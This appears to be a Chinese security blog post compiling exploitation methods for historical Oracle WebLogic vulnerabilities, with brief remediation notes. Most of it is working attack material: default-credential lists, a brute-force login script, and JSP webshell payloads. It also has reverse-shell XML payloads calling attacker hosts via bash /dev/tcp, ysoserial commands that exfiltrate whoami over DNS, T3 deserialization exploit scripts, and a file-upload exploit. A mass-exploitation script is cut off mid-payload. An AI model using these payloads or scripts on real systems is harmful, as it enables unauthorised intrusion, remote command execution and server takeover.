路漫漫其修远兮,吾将上下而求索

0%

weblogic漏洞总结

发表于 分类于
weblogic历史漏洞利用总结与检测

弱口令

1
weblogic:weblogic
2
weblogic:weblogic123
3
weblogic:Oracle@123
4
system:password
5
admin:security
6
joe:password
7
mary:password
8
system:security
9
wlcsystem:wlcsystem
10
wlpisystem

登录界面

1
/console/login/LoginForm.jsp

爆破脚本

1
import requests
2
import sys
3
def weakPasswd(url):
4
    """weak password"""
5
6
    pwddict = ['Weblogic', 'weblogic', 'weblogic123', 'Oracle@123', 'password', 'system', 'Administrator', 'admin',
7
               'security', 'joe', 'mary', 'wlcsystem', 'wlpisystem']
8
    for user in pwddict:
9
        for pwd in pwddict:
10
            data = {
11
                'j_username': user,
12
                'j_password': pwd,
13
                'j_character_encoding': 'UTF-8'
14
            }
15
            req = requests.post(url + '/console/j_security_check', data=data, allow_redirects=False,
16
                                verify=False)
17
18
            if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text:
19
                print('[+] WebLogic  username: ' + user + '  password: ' + pwd)
20
                return True
21
    return False
22
23
if __name__=="__main__":
24
    if len(sys.argv)!=2 or sys.argv[1]=="-h":
25
        print("python3 test.py http://ip:port")
26
        exit()
27
    weakPasswd(sys.argv[1])

进图管理员页面

部署->安装->上载文件->制作war包->上传->一直下一步->完成->保存

shell地址 http://ip/filename/filename.jsp

WebLogic XMLDecoder反序列化漏洞( CVE-2017-3506 ,CVE-2017-10271)

version

1
10.3.6.0.0,
2
12.1.3.0.0
3
12.2.1.1.0
4
12.2.1.2.0

漏洞利用

漏洞页面

1
/wls-wsat/CoordinatorPortType
2
/wls-wsat/CoordinatorPortType11
3
/wls-wsat/ParticipantPortType
4
/wls-wsat/ParticipantPortType11
5
/wls-wsat/RegistrationPortTypeRPC
6
/wls-wsat/RegistrationPortTypeRPC11
7
/wls-wsat/RegistrationRequesterPortType
8
/wls-wsat/RegistrationRequesterPortType11

向此页面post 以下,Content-Type一定要设置为 text/xml 利用成功返回 500

之后访问poc内的文件路径。例如 :bea_wls_internal/test.jsp

探测poc

输出

1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
2
    <soapenv:Header>
3
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
4
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
5
    <object class="java.io.PrintWriter"> 
6
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
7
    <void method="println"><string>
8
    <![CDATA[
9
<% out.print("CVE-2017-10271"); %>
10
    ]]>
11
    </string>
12
    </void>
13
    <void method="close"/>
14
    </object></java></java>
15
    </work:WorkContext>
16
    </soapenv:Header>
17
    <soapenv:Body/>
18
</soapenv:Envelope>

命令执行

1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println"><string><![CDATA[<%   if("h3art3ars".equals(request.getParameter("password"))){  
2
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("command")).getInputStream();  
3
        int a = -1;  
4
        byte[] b = new byte[2048];  
5
        out.print("<pre>");  
6
        while((a=in.read(b))!=-1){  
7
            out.println(new String(b));  
8
        }  
9
        out.print("</pre>");  
10
    } %>]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
1
bea_wls_internal/test.jsp?password=h3art3ars&command=whoami

反弹shell

1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
2
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
3
<java version="1.4.0" class="java.beans.XMLDecoder">
4
<void class="java.lang.ProcessBuilder">
5
<array class="java.lang.String" length="3">
6
<void index="0">
7
<string>/bin/bash</string>
8
</void>
9
<void index="1">
10
<string>-c</string>
11
</void>
12
<void index="2">
13
<string>bash -i >& /dev/tcp/10.0.0.1/21 0>&1</string>
14
</void>
15
</array>
16
<void method="start"/></void>
17
</java>
18
</work:WorkContext>
19
</soapenv:Header>
20
<soapenv:Body/>
21
</soapenv:Envelope>

修复建议

根据实际环境路径,删除WebLogicwls-wsat组件;删除相关文件后重启weblogic,保证访问wls-wsat/提示404错误;

Oracle下载相关10271补丁

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

version

1
Weblogic 10.3.6.0
2
Weblogic 12.1.3.0
3
Weblogic 12.2.1.2
4
Weblogic 12.2.1.3

漏洞利用

poc1

1
java -cp ysoserial.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 "ping -c1 `whoami`.lfagoh.ceye.io"

或poc2

1
(JRE 版本小于等于 1.7u21)
2
java -cp ysoserial.jar  ysoserial.exploit.JRMPListener [listen port] Jdk7u21  "ping -c1 `whoami`.lfagoh.ceye.io"

之后

1
python /usr/share/exploitdb/exploits/multiple/remote/44553.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] JRMPClient

绕过补丁(cve-2018-2893)

检测脚本

1
#!env python
2
# -*- coding: utf-8 -*-
3
import socket
4
import time
5
import re
6
import sys
7
8
VUL=['CVE-2018-2893']
9
#remote ip changed to :127.0.0.1
10
PAYLOAD=['ACED0005737200257765626C6F6769632E6A6D732E636F6D6D6F6E2E53747265616D4D657373616765496D706C6B88DE4D93CBD45D0C00007872001F7765626C6F6769632E6A6D732E636F6D6D6F6E2E4D657373616765496D706C69126161D04DF1420C000078707A000001251E200000000000000100000118ACED0005737D00000001001A6A6176612E726D692E72656769737472792E5265676973747279787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707732000A556E696361737452656600093132372E302E302E310000F1440000000046911FD80000000000000000000000000000007878']
11
12
VER_SIG=['StreamMessageImpl']
13
14
def t3handshake(sock,server_addr):
15
    sock.connect(server_addr)
16
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
17
    time.sleep(1)
18
    data = sock.recv(1024)
19
    #print data
20
    print 'handshake successful'
21
22
def buildT3RequestObject(sock,port):
23
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
24
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
25
    data3 = '1a7727000d3234322e323134'
26
    data4 = '2e312e32353461863d1d0000000078'
27
    for d in [data1,data2,data3,data4]:
28
        sock.send(d.decode('hex'))
29
    time.sleep(2)
30
    print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
31
32
def sendEvilObjData(sock,data):
33
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
34
    payload+=data
35
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
36
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
37
    sock.send(payload.decode('hex'))
38
    time.sleep(2)
39
    sock.send(payload.decode('hex'))
40
    res = ''
41
    try:
42
        while True:
43
            res += sock.recv(4096)
44
            time.sleep(0.1)
45
    except Exception as e:
46
        pass
47
    return res
48
49
def checkVul(res,server_addr,index):
50
    p=re.findall(VER_SIG[index], res, re.S)
51
    if len(p)>0:
52
        print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
53
    else:
54
        print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
55
56
def run(dip,dport,index):
57
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
58
    ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整
59
    sock.settimeout(15)
60
    server_addr = (dip, dport)
61
    t3handshake(sock,server_addr)
62
    buildT3RequestObject(sock,dport)
63
    rs=sendEvilObjData(sock,PAYLOAD[index])
64
    #print 'rs',rs
65
    checkVul(rs,server_addr,index)
66
67
if __name__=="__main__":
68
    dip = sys.argv[1]
69
    dport = int(sys.argv[2])
70
    run(dip,dport,0)

利用

1
java -jar ysoserial.jar JRMPClient "localip:localport"  > shell.cer
1
java -cp ysoserial.jar ysoserial.exploit.JRMPListener  5555 Jdk7u21 "touch /tmp/a.txt"
1
python weblogic.py [tagetip] [port] shell.cer

weblogic.py

1
2
#!env python
3
# -*- coding: utf-8 -*-
4
import socket
5
import time
6
import re
7
import sys
8
 
9
VUL=['CVE-2018-2893']
10
#remote ip changed to :127.0.0.1
11
PAYLOAD=['ACED0005737200257765626C6F6769632E6A6D732E636F6D6D6F6E2E53747265616D4D657373616765496D706C6B88DE4D93CBD45D0C00007872001F7765626C6F6769632E6A6D732E636F6D6D6F6E2E4D657373616765496D706C69126161D04DF1420C000078707A000001251E200000000000000100000118ACED0005737D00000001001A6A6176612E726D692E72656769737472792E5265676973747279787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707732000A556E696361737452656600093132372E302E302E310000F1440000000046911FD80000000000000000000000000000007878']
12
 
13
VER_SIG=['StreamMessageImpl']
14
 
15
def t3handshake(sock,server_addr):
16
    sock.connect(server_addr)
17
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
18
    time.sleep(1)
19
    data = sock.recv(1024)
20
    #print data
21
    print 'handshake successful'
22
 
23
def buildT3RequestObject(sock,port):
24
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
25
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
26
    data3 = '1a7727000d3234322e323134'
27
    data4 = '2e312e32353461863d1d0000000078'
28
    for d in [data1,data2,data3,data4]:
29
        sock.send(d.decode('hex'))
30
    time.sleep(2)
31
    print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
32
 
33
 
34
def sendEvilObjData(sock,data):
35
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
36
    payload+=data
37
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
38
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
39
    sock.send(payload.decode('hex'))
40
    time.sleep(2)
41
    sock.send(payload.decode('hex'))
42
    res = ''
43
    try:
44
        while True:
45
            res += sock.recv(4096)
46
            time.sleep(0.1)
47
    except Exception as e:
48
        pass
49
    return res
50
 
51
def checkVul(res,server_addr,index):
52
    p=re.findall(VER_SIG[index], res, re.S)
53
    if len(p)>0:
54
        print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
55
    else:
56
        print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
57
 
58
 
59
def run(dip,dport,index):
60
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
61
    
62
    sock.settimeout(15)
63
    server_addr = (dip, dport)
64
    t3handshake(sock,server_addr)
65
    buildT3RequestObject(sock,dport)
66
    rs=sendEvilObjData(sock,PAYLOAD[index])
67
    #print 'rs',rs
68
    checkVul(rs,server_addr,index)
69
 
70
if __name__=="__main__":
71
    dip = sys.argv[1]
72
    dport = int(sys.argv[2])
73
    run(dip,dport,0)

Weblogic 任意文件上传漏洞(CVE-2018-2894)

version

1
10.3.6.0,
2
12.1.3.0,
3
12.2.1.2,
4
12.2.1.3

漏洞的影响模块为web服务测试页 ,可在base_domain->高级->启用web服务测试页 来启用

利用

1.

访问 ws_utc/config.do ,设置 Work Home Dir:/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

之后点击安全->添加->上传文件->提交。记住返回的时间戳。

shell地址: ws_utc/css/config/keystore/[timestamp]_[文件名]

2.

访问 ws_utc/begin.do,点击右上角导入测试用例,上传shell。查看返回包的shell地址。

检测加利用脚本

1
#!/usr/bin/env python
2
# coding:utf-8
3
# Build By LandGrey
4
5
import re
6
import sys
7
import time
8
import argparse
9
import requests
10
import traceback
11
import xml.etree.ElementTree as ET
12
13
14
def get_current_work_path(host):
15
    geturl = host + "/ws_utc/resources/setting/options/general"
16
    ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
17
    values = []
18
    try:
19
        request = requests.get(geturl)
20
        if request.status_code == 404:
21
            exit("[-] {}  don't exists CVE-2018-2894".format(host))
22
        elif "Deploying Application".lower() in request.text.lower():
23
            print("[*] First Deploying Website Please wait a moment ...")
24
            time.sleep(20)
25
            request = requests.get(geturl, headers=ua)
26
        if "</defaultValue>" in request.content:
27
            root = ET.fromstring(request.content)
28
            value = root.find("section").find("options")
29
            for e in value:
30
                for sub in e:
31
                    if e.tag == "parameter" and sub.tag == "defaultValue":
32
                        values.append(sub.text)
33
    except requests.ConnectionError:
34
        exit("[-] Cannot connect url: {}".format(geturl))
35
    if values:
36
        return values[0]
37
    else:
38
        print("[-] Cannot get current work path\n")
39
        exit(request.content)
40
41
42
def get_new_work_path(host):
43
    origin_work_path = get_current_work_path(host)
44
    works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css"
45
    if "user_projects" in origin_work_path:
46
        if "\\" in origin_work_path:
47
            works = works.replace("/", "\\")
48
            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains"
49
            dir_len = len(current_work_home.split("\\"))
50
            domain_name = origin_work_path.split("\\")[dir_len]
51
            current_work_home += "\\" + domain_name + works
52
        else:
53
            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains"
54
            dir_len = len(current_work_home.split("/"))
55
            domain_name = origin_work_path.split("/")[dir_len]
56
            current_work_home += "/" + domain_name + works
57
    else:
58
        current_work_home = origin_work_path
59
        print("[*] cannot handle current work home dir: {}".format(origin_work_path))
60
    return current_work_home
61
62
63
def set_new_upload_path(host, path):
64
    data = {
65
        "setting_id": "general",
66
        "BasicConfigOptions.workDir": path,
67
        "BasicConfigOptions.proxyHost": "",
68
        "BasicConfigOptions.proxyPort": "80"}
69
    request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers)
70
    if "successfully" in request.content:
71
        return True
72
    else:
73
        print("[-] Change New Upload Path failed")
74
        exit(request.content)
75
76
77
def upload_webshell(host, uri):
78
    set_new_upload_path(host, get_new_work_path(host))
79
    files = {
80
        "ks_edit_mode": "false",
81
        "ks_password_front": password,
82
        "ks_password_changed": "true",
83
        "ks_filename": ("360sglab.jsp", upload_content)
84
    }
85
86
    request = requests.post(host + uri, files=files)
87
    response = request.text
88
    match = re.findall("<id>(.*?)</id>", response)
89
    if match:
90
        tid = match[-1]
91
        shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp"
92
        if upload_content in requests.get(shell_path, headers=headers).content:
93
            print("[+] {} exists CVE-2018-2894".format(host))
94
            print("[+] Check URL: {} ".format(shell_path))
95
        else:
96
            print("[-] {}  don't exists CVE-2018-2894".format(host))
97
    else:
98
        print("[-] {}  don't exists CVE-2018-2894".format(host))
99
100
101
if __name__ == "__main__":
102
    start = time.time()
103
    password = "360sglab"
104
    url = "/ws_utc/resources/setting/keystore"
105
    parser = argparse.ArgumentParser()
106
    parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str,
107
                        help="target, such as: http://example.com:7001")
108
109
    upload_content = "360sglab test"
110
    headers = {
111
        'Content-Type': 'application/x-www-form-urlencoded',
112
        'X-Requested-With': 'XMLHttpRequest', }
113
114
    if len(sys.argv) == 1:
115
        sys.argv.append('-h')
116
    args = parser.parse_args()
117
    target = args.target
118
119
    target = target.rstrip('/')
120
    if "://" not in target:
121
        target = "http://" + target
122
    try:
123
        upload_webshell(target, url)
124
    except Exception as e:
125
        print("[-] Error: \n")
126
        traceback.print_exc()

修复

1.设置Config.do、begin.do页面登录授权后访问;

2.IPS等防御产品可以加入相应的特征;

3.升级到官方最新版本。

Weblogic反序列化远程代码执行漏洞(CVE-2019-2725)

version

1
Oracle WebLogic Server 10.*
2
Oracle WebLogic Server 12.1.3

检测路径

1
/_async/AsyncResponseService
2
/_async/AsyncResponseServiceHttps
3
/_async/AsyncResponseServiceJms

利用

1
import requests
2
  import sys
3
  if not (len(sys.argv)==4):
4
      print "使用方法:VPS监听端口 weblogic.py 目标网址 VPSip 端口"
5
  else:
6
      try:
7
          url= "%s/_async/AsyncResponseService"  % (sys.argv[1])
8
          raw='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
9
          <soapenv:Header> 
10
          <wsa:Action>xx</wsa:Action>
11
          <wsa:RelatesTo>xxxxxxx</wsa:RelatesTo>
12
          <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
13
          <void class="java.lang.ProcessBuilder">
14
          <array class="java.lang.String" length="3">
15
          <void index="0">
16
          <string>/bin/bash</string>
17
          </void>
18
          <void index="1">
19
          <string>-c</string>
20
          </void>
21
          <void index="2">
22
          <string>bash -i >& /dev/tcp/%s/%s 0>&1</string>
23
          </void>
24
          </array>
25
          <void method="start"/></void>
26
          </work:WorkContext>
27
          </soapenv:Header>
28
          <soapenv:Body>
29
          <asy:onAsyncDelivery/>
30
          </soapenv:Body></soapenv:Envelope>'''  % (sys.argv[2],sys.argv[3])
31
          print url
32
          header = {'content-type': 'text/xml'}
33
          r=requests.post(url,headers=header,data=raw)
34
          if (r.status_code==202):
35
              print "反弹成功!"
36
          else :
37
              print"漏洞不存在!"
38
      except:
39
          print "使用方法:VPS监听端口 weblogic.py 目标网址 VPSip 端口"

批量

1
import gevent
2
from gevent import  monkey;monkey.patch_all()
3
import requests
4
import os
5
import sys
6
from multiprocessing import Process
7
8
class Weblogic:
9
    def __init__(self,headers,data,path):
10
        self.headers=headers
11
        self.data=data
12
        self.path=path
13
14
    def exploit(self,url):
15
        urls='{}{}'.format(str(url).rstrip('/').strip(),self.path)
16
        urls2='{}{}'.format(str(url).rstrip('/').strip(),'/_async/webshells.jsp')
17
        try:
18
            rqt=requests.get(url=urls,headers=self.headers)
19
            if rqt.status_code==200 and 'Test page' in rqt.text:
20
                rvt=requests.post(url=urls,headers=self.headers,data=self.data,timeout=3)
21
                if rvt.status_code==202:
22
                    rbt=requests.get(url=urls2,headers=headers)
23
                    if rbt.status_code==200 and not '404' in rbt.text:
24
                        print('[+] weblogic反序列化漏洞利用成功,ip:{} password:{} 利用方式如:{}'.format(urls2,'123','{}?pwd=123&cmd=whoami'.format(urls2)))
25
                        print('[+] weblogic反序列化漏洞利用成功,ip:{} password:{} 利用方式如:{}'.format(urls2, '123','{}?pwd=123&cmd=whoami'.format(urls2)),file=open('save.txt','a',encoding='utf-8'))
26
                    else:
27
                        print('[-] 利用失败 url:{} 状态码:{}'.format(rbt.url,rbt.status_code))
28
                else:
29
                    print('[-] 利用失败 url:{} 状态码:{}'.format(rvt.url,rvt.status_code))
30
            else:
31
                print('[-] 不存在weblogic反序列化漏洞-CVE-2019-48814 http状态码:{} url:{}'.format(rqt.status_code,urls))
32
        except:
33
            pass
34
35
    def xc(self,rw):
36
        xs=[]
37
        for r in rw:
38
            xs.append(gevent.spawn(self.exploit,r))
39
40
        gevent.joinall(xs)
41
42
    def djc(self,id):
43
        url_list=[]
44
        calc=0
45
        if str(id)=='1':
46
            print('[+] 单个url检测')
47
            xw=input('url>')
48
            self.exploit(url=xw)
49
        elif str(id)=='2':
50
            print('[+] 批量检测')
51
            xw=input(r'文件路径>')
52
            if os.path.exists(xw):
53
                print('[+] 找到对应的文件')
54
                with open(xw,'r',encoding='utf-8') as x:
55
                    calc+=1
56
                    if calc==100:
57
                        p=Process(target=self.xc,args=(url_list,))
58
                        p.start()
59
                        calc=0
60
                        url_list.clear()
61
62
                    for r in x.readlines():
63
                        qc="".join(r.split('\n'))
64
                        url_list.append(qc)
65
66
                if len(url_list)>0:
67
                    b = Process(target=self.xc, args=(url_list,))
68
                    b.start()
69
            else:
70
                print('[-] 找不到对应的文件')
71
                exit()
72
73
if __name__ == '__main__':
74
    headers={'user-agent':'Apache-HttpClient/4.1.1 (java 1.5)','Connection':'keep-alive','content-type': 'text/xml','Accept-Encoding':'gzip, deflate'}
75
    path='/_async/AsyncResponseService'
76
    data="""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
77
<soapenv:Header> 
78
<wsa:Action>xx</wsa:Action>
79
<wsa:RelatesTo>xx</wsa:RelatesTo>
80
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
81
<void class="java.lang.ProcessBuilder">
82
<array class="java.lang.String" length="3">
83
<void index="0">
84
<string>/bin/bash</string>
85
</void>
86
<void index="1">
87
<string>-c</string>
88
</void>
89
<void index="2">
90
